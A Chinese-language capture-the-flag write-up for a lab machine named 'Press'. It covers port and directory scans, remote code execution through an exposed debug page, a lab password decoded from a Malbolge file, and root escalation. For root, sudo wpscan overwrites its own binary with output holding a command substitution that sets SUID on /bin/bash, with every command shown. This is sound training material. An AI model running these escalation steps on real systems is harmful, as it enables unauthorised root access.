Press

靶机:Press
作者:群主
靶机ID: 659
系统:Linux
难度:Baby

信息搜集

192.168.43.126

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.126 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.126:22
Open 192.168.43.126:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.126
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-15 13:44 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
Initiating ARP Ping Scan at 13:44
Scanning 192.168.43.126 [1 port]
Completed ARP Ping Scan at 13:44, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:44
Completed Parallel DNS resolution of 1 host. at 13:44, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:44
Scanning 192.168.43.126 [2 ports]
Discovered open port 22/tcp on 192.168.43.126
Discovered open port 80/tcp on 192.168.43.126
Completed SYN Stealth Scan at 13:44, 0.02s elapsed (2 total ports)
Initiating Service scan at 13:44
Scanning 2 services on 192.168.43.126
Completed Service scan at 13:44, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.126
Retrying OS detection (try #2) against 192.168.43.126
NSE: Script scanning 192.168.43.126.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 5.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
Nmap scan report for 192.168.43.126
Host is up, received arp-response (0.00049s latency).
Scanned at 2026-05-15 13:44:40 CST for 15s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian))
|_http-server-header: Apache/2.4.66 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:1C:1E:7F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.19 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=5/15%OT=22%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6A06B2D7%P=x86_64-pc-linux-gnu)
SEQ(SP=100%GCD=1%ISR=10E%TI=Z%TS=21)
SEQ(SP=107%GCD=1%ISR=108%TI=Z%TS=20)
OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5B4ST11NW8%O6=M5B4ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=N)

Uptime guess: 0.000 days (since Fri May 15 13:44:47 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.43.126

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:44
Completed NSE at 13:44, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.01 seconds
Raw packets sent: 83 (8.676KB) | Rcvd: 19 (1.012KB)
  • 22 SSH
  • 80 HTTP

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# gobuster dir -u http://192.168.43.126/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg,json,md
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.126/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: jpg,json,md,php,txt,html,back,cgi
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 10703]
test.php (Status: 200) [Size: 72536]
debug.php (Status: 200) [Size: 1291]
......

/debug.php是一个wpscan扫描页面

但是输入框无法输入任何东西,因为被设置了readonly去掉即可

image

经过测试发现还可以执行rce,那么直接反弹shell但是发现弹不到,想着会不会设置了出站规则,尝试80端口成功的弹到了shell

image

提权

www -> sky

/opt目录下有一个code文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@Press:/var/www/html$ cd /opt/
www-data@Press:/opt$ ls
code
www-data@Press:/opt$ cat code
>b<;:9]~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:
987SRQ3INGFKJIBAe('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^
]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#"!~}|{zyxwvutsrqp
onmlkjihgfe#cy~w|{zyxqvon4rTj0nmlNdcb(IHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$
#"!~}|{zyxwvutsrqponml*)i!&%$#"!x}v<]\[ZYXWVUTSRQPONMLKJ`_dcba`Y^W\Uy<;:9876
543210/.-,+*)?DCBA@?>=6;4Xyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIH
GFEDCBA@?>=<;:9876543210LKJIHGFED=B;:^!~}|{zyxwvutsrqponml*)('&f$#zy~w=^]\[Z
YXWVUTSRQPONMiKaf_^]ba`_X|V[ZYXWPt76543210/.-,+*)('&<A:?>=<;:981U5u-,+O/o-&J
kjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543INMLKJIHAFE>b%$@?!7
<;:981Uvutsrq/.-,+*)i'&}Cdcba`_^]\xwvutsrkji/Pf,MLKJIHGFEDCBA@?>=<;:98765432
10/.-,+*)('&%$#"!~}|{zyxwvutsrq/.-,+*)('~f${Aba`_^]\[wYutsrkpohg-edibgf_%p
www-data@Press:/opt$

这是 Malbolge esoteric 编程语言的代码

作为世界上设计之初就以“极度难以编写和理解”闻名的编程语言,Malbolge 的代码呈现出一种极高熵的、类似于密码学乱码的视觉特征。每一行看似无意义的 ASCII 字符,实际上在 Malbolge 的加密指令集和代码自修改(Self-modifying)机制下,都对应着特定的三进制寄存器操作。

这里使用在线网站解密

https://malbolge.doleczek.pl

image

sky:Da8eag6NxbC1jJ9as8cb

横向移动到sky用户

1
2
3
4
5
www-data@Press:/opt$ su sky
Password:
sky@Press:/opt$ id
uid=1000(sky) gid=1000(sky) groups=1000(sky),100(users)
sky@Press:/opt$

sky -> root

1
2
3
4
5
6
7
sky@Press:/opt$ sudo -l
Matching Defaults entries for sky on Press:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sky may run the following commands on Press:
(ALL : ALL) NOPASSWD: /usr/local/bin/wpscan
sky@Press:/opt$

可以使用wpscan提权

原理分析

  • 特权文件覆盖: wpscan​ 具备 -o​(或 --output​)参数。当以 sudo​(root)权限运行时,该参数允许将扫描结果强行写入或覆盖系统上的任何文件(包括普通用户无权修改的 /usr/local/bin/wpscan)。
  • 文本默认解释器行为: 当 Linux 尝试执行一个纯文本文件(没有任何二进制魔数或 #!​ 声明)时,系统默认会调用当前用户的默认 Shell(如 Bash)将其作为脚本​逐行解析。尽管会遇到大量的 JSON 语法错误,但 Shell 会忽略错误并继续向下执行。
  • Shell 弱引用与命令替换: 在双引号或类似弱引用环境下,Shell 遇到 $(...)​ 结构时,会开辟子进程优先执行括号内的命令(即命令替换)。通过精心构造的 URL,可将恶意 $(command) 注入到导出的文本中,在系统下一次调用该“脚本”时触发 root 权限下的命令执行。

我们首先在可写的 /tmp目录下编写一个为系统的 /bin/bash 赋予 SUID 权限的脚本

1
2
sky@Press:~$ echo "chmod +s /bin/bash" > /tmp/bashs
sky@Press:~$ chmod +x /tmp/bashs

利用 sudo​ 权限运行 wpscan​。通过单引号 '​ 包裹包含命令替换符 $(/tmp/bashs)​ 的恶意 URL,使其逃逸当前 Shell 的解析,原样传递给 wpscan​。同时利用 -o​ 参数将输出路径指定为 wpscan 自身的程序路径。

1
sky@Press:~$ sudo wpscan -o /usr/local/bin/wpscan --no-banner -f json --url 'http://loca$(/tmp/bashs)lhost:8080'

wpscan​ 因不合法的 URL 扫描失败,并将错误信息写入了 /usr/local/bin/wpscan。此时该文件已被篡改

1
2
3
4
5
6
sky@Press:/var/www/html$ cat /usr/local/bin/wpscan
{
"scan_aborted": "The url supplied 'http://loca$(/tmp/bashs)lhost:8080/' seems to be down (URL using bad/illegal format or missing URL)",
"target_url": "http://loca$(/tmp/bashs)lhost:8080/"
}
sky@Press:/var/www/html$

再次调用sudo wpscan​。此时系统会将已经被改写为 JSON 文本的 wpscan 当作 Shell 脚本逐行解析。

1
2
3
sky@Press:/var/www/html$ sudo wpscan
/usr/local/bin/wpscan: 2: scan_aborted:: not found
/usr/local/bin/wpscan: 3: target_url:: not found

底层逻辑: 尽管前两行报语法错误,但当 Shell 解析到 "target_url"​ 行时,双引号触发了弱引用机制。系统为了提取 $(/tmp/bashs)​ 的输出,在 root 权限(因为是 sudo 调用) 下优先执行了 /tmp/bashs​,从而成功将 /bin/bash 设为 SUID 状态

1
2
3
4
5
6
sky@Press:/var/www/html$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1298416 Mar 8 11:21 /bin/bash
sky@Press:/var/www/html$ /bin/bash -p
bash-5.2# id
uid=1000(sky) gid=1000(sky) euid=0(root) egid=0(root) groups=0(root),100(users),1000(sky)
bash-5.2#